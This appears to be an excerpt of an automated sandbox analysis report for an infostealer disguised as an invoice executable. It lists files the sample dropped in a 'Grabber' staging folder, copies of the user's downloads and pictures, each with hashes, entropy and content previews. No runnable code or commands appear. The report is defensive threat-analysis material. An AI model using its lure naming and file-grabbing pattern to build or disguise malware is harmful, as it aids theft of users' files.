KMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\System\Process.txt

Download File

